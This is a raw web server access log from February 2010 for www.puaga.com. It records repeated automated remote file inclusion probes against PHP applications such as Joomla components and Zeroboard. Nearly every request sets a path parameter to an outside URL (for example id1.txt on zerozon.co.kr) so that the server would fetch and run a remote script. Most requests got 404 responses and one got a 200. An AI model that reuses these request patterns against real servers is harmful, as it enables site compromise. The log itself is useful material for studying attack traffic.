202.124.116.194 - - [25/Feb/2010:07:05:34 -0800] "GET /logs/access_100124.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:07:05:38 -0800] "GET /logs/access.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:07:16 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:07:16 -0800] "GET /logs/access_100123.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:07:25 -0800] "GET /logs/access_100219.log%20%20//delete_all.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:07:25 -0800] "GET /logs//delete_all.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:07:25 -0800] "GET /delete_all.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:07:29 -0800] "GET /delete_all.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:07:29 -0800] "GET /logs/access_100219.log%20%20//delete_all.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:07:29 -0800] "GET /logs//delete_all.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [25/Feb/2010:07:07:45 -0800] "GET ///?_zb_path=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 200 3642 "-" "-" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:07:58 -0800] "GET /logs/access_100219.log%20%20//delete_all.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:07:58 -0800] "GET /logs//delete_all.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:07:58 -0800] "GET /delete_all.php?board_skin_path=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.118.224.2 - - [25/Feb/2010:07:08:51 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.zetaintelex.com/images/smilies/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.118.224.2 - - [25/Feb/2010:07:09:06 -0800] "GET /logs/access_100211.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.zetaintelex.com/images/smilies/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.156 - - [25/Feb/2010:07:09:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:10:13 -0800] "GET /galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:10:14 -0800] "GET /logs//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:10:14 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:10:17 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:10:17 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:10:17 -0800] "GET /logs/access_100123.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:10:18 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:10:18 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:10:18 -0800] "GET /logs/access_100123.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:10:19 -0800] "GET /galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:10:20 -0800] "GET /logs//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:10:20 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:10:41 -0800] "GET /galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:10:41 -0800] "GET /logs//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:10:41 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [25/Feb/2010:07:10:55 -0800] "GET /logs/access_100131.log%20%20///playing.php/common/db.php?commonpath=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [25/Feb/2010:07:10:55 -0800] "GET /logs///playing.php/common/db.php?commonpath=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [25/Feb/2010:07:10:55 -0800] "GET //playing.php/common/db.php?commonpath=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:10:59 -0800] "GET /galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:10:59 -0800] "GET /logs//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:10:59 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:11:02 -0800] "GET /galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:11:02 -0800] "GET /logs/access_100201.log%20%20//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:07:11:35 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:07:11:36 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:12:46 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:12:46 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:12:46 -0800] "GET /logs/access_100217.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:12:50 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:12:50 -0800] "GET /logs/access_100217.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:12:51 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:12:56 -0800] "GET /logs/access_100210.log%20%20//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:13:00 -0800] "GET /logs/access_100210.log%20%20//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [25/Feb/2010:07:13:02 -0800] "GET /logs/access_100129.log%20%20//community///bbs/write_update.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [25/Feb/2010:07:13:02 -0800] "GET /logs//community///bbs/write_update.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [25/Feb/2010:07:13:02 -0800] "GET /community///bbs/write_update.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [25/Feb/2010:07:13:06 -0800] "GET /logs/access_100130.log%20%20//community///bbs/write_update.php?board_skin_path=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:13:07 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:13:08 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:13:09 -0800] "GET /logs/access_100217.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:13:16 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:13:16 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [25/Feb/2010:07:13:17 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php/mosConfig_absolute_path=http://www.generalgroup.ru/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [25/Feb/2010:07:13:17 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php/mosConfig_absolute_path=http://www.generalgroup.ru/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [25/Feb/2010:07:13:17 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php/mosConfig_absolute_path=http://www.generalgroup.ru/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:13:17 -0800] "GET /logs/access_100217.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:13:19 -0800] "GET /logs/access_100126.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:13:25 -0800] "GET /logs/access_100126.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [25/Feb/2010:07:13:27 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php/mosConfig_absolute_path=http://www.generalgroup.ru/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [25/Feb/2010:07:13:27 -0800] "GET /logs/access_100203.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php/mosConfig_absolute_path=http://www.generalgroup.ru/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [25/Feb/2010:07:13:27 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php/mosConfig_absolute_path=http://www.generalgroup.ru/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:13:32 -0800] "GET /logs/access_100210.log%20%20//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:13:52 -0800] "GET /logs/access_100129.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:14:03 -0800] "GET /logs/access_100210.log%20%20//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:14:45 -0800] "GET /logs/access_100212.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.87.240.120 - - [25/Feb/2010:07:14:47 -0800] "GET /delete_comment.php?board_skin_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.202.102.218 - - [25/Feb/2010:07:15:13 -0800] "GET /logs/access_100214.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php/mosConfig_absolute_path=http://www.generalgroup.ru/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:07:15:14 -0800] "GET /logs/access_100210.log%20%20//galeria.php?start=0&kategoria=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:15:20 -0800] "GET /logs/access_100212.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:15:39 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:15:39 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:07:15:39 -0800] "GET /logs/access_100217.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [25/Feb/2010:07:15:42 -0800] "GET /logs/access_100214.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php/mosConfig_absolute_path=http://www.generalgroup.ru/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:16:37 -0800] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:16:37 -0800] "GET /logs//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:16:37 -0800] "GET /logs/access_100219.log%20%20//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:17:17 -0800] "GET /logs/access_100214.log%20%20//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:17:18 -0800] "GET /logs/access_100214.log%20%20//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:17:36 -0800] "GET /jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:17:36 -0800] "GET /logs//jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:17:36 -0800] "GET /logs/access_100129.log%20%20//jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:17:47 -0800] "GET /jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:17:47 -0800] "GET /logs//jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:17:47 -0800] "GET /logs/access_100129.log%20%20//jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:17:49 -0800] "GET /logs//jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:17:49 -0800] "GET /jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:17:49 -0800] "GET /logs/access_100129.log%20%20//jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:07:17:57 -0800] "GET /logs//board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:07:17:57 -0800] "GET /logs/access.log%20%20//board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:07:17:57 -0800] "GET /board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:07:18:07 -0800] "GET /logs/access.log%20%20//board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:07:18:07 -0800] "GET /board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:07:18:07 -0800] "GET /logs//board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:07:18:13 -0800] "GET /home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:07:18:13 -0800] "GET /logs/home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:07:18:14 -0800] "GET /logs/access_100218.log%20%20/home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:07:18:17 -0800] "GET /logs/access_100126.log%20%20//board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:07:18:24 -0800] "GET /home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:07:18:24 -0800] "GET /logs/access_100218.log%20%20/home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:07:18:24 -0800] "GET /logs/home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:07:18:28 -0800] "GET /logs/access_100126.log%20%20//board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:18:32 -0800] "GET /logs/access_100217.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:18:32 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:18:33 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:18:35 -0800] "GET /logs/access_100217.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:18:35 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:07:18:35 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [25/Feb/2010:07:18:36 -0800] "GET /logs/access_100126.log%20%20//board.php?code=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:07:18:36 -0800] "GET /logs/access_100204.log%20%20/home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.118.224.2 - - [25/Feb/2010:07:18:44 -0800] "GET /logs/access_100211.log//components/com_forum/download.php?phpbb_root_path=http://www.zetaintelex.com/images/smilies/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:07:18:46 -0800] "GET /logs/access_100208.log%20%20//jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:07:19:05 -0800] "GET /logs/access_100218.log%20%20/home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
